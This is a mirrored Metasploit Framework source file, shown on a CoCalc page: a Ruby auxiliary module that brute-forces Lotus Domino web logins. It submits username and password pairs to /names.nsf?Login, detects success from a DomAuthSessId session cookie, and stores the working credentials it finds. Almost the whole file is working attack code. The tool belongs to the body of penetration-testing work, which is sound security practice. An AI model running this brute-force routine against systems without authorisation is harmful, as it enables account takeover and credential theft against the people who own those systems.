CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/lotus/lotus_domino_login.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::AuthBrute

9
  include Msf::Auxiliary::Report

10
  include Msf::Auxiliary::Scanner

11


12


13
  def initialize

14
    super(

15
      'Name'           => 'Lotus Domino Brute Force Utility',

16
      'Description'    => 'Lotus Domino Authentication Brute Force Utility',

17
      'Author'         => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',

18
      'License'        =>  MSF_LICENSE

19
    )

20


21
  end

22


23
  def run_host(ip)

24


25
    each_user_pass { |user, pass|

26
      do_login(user, pass)

27
    }

28


29
  end

30


31
  def report_cred(opts)

32
    service_data = {

33
      address: opts[:ip],

34
      port: opts[:port],

35
      service_name: opts[:service_name],

36
      protocol: 'tcp',

37
      workspace_id: myworkspace_id

38
    }

39


40
    credential_data = {

41
      origin_type: :service,

42
      module_fullname: fullname,

43
      username: opts[:user],

44
      private_data: opts[:password],

45
      private_type: :password

46
    }.merge(service_data)

47


48
    login_data = {

49
      last_attempted_at: Time.now,

50
      core: create_credential(credential_data),

51
      status: Metasploit::Model::Login::Status::SUCCESSFUL,

52
      proof: opts[:proof]

53
    }.merge(service_data)

54


55
    create_credential_login(login_data)

56
  end

57


58
  def do_login(user=nil,pass=nil)

59
    post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"

60
    vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'")

61


62
    begin

63


64
      res = send_request_cgi({

65
        'method'  => 'POST',

66
        'uri'     => '/names.nsf?Login',

67
        'data'    => post_data,

68
      }, 20)

69


70
      if res and res.code == 302

71
        if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)

72
          print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")

73
          report_cred(

74
            ip: rhost,

75
            port: rport,

76
            service_name: (ssl ? "https" : "http"),

77
            user: user,

78
            password: pass,

79
            proof: "WEBAPP=\"Lotus Domino\", VHOST=#{vhost}, COOKIE=#{res.get_cookies}"

80
          )

81
          return :next_user

82
        end

83


84
        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")

85
        return :abort

86


87
      elsif res.body.to_s =~ /names.nsf\?Login/

88
        vprint_error("http://#{vhost}:#{rport} - Lotus Domino - Failed to login as '#{user}'")

89
        return

90
      else

91
        print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response") if res

92
        return :abort

93
      end

94


95
      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

96
      rescue ::Timeout::Error, ::Errno::EPIPE

97
    end

98
  end

99
end

100


101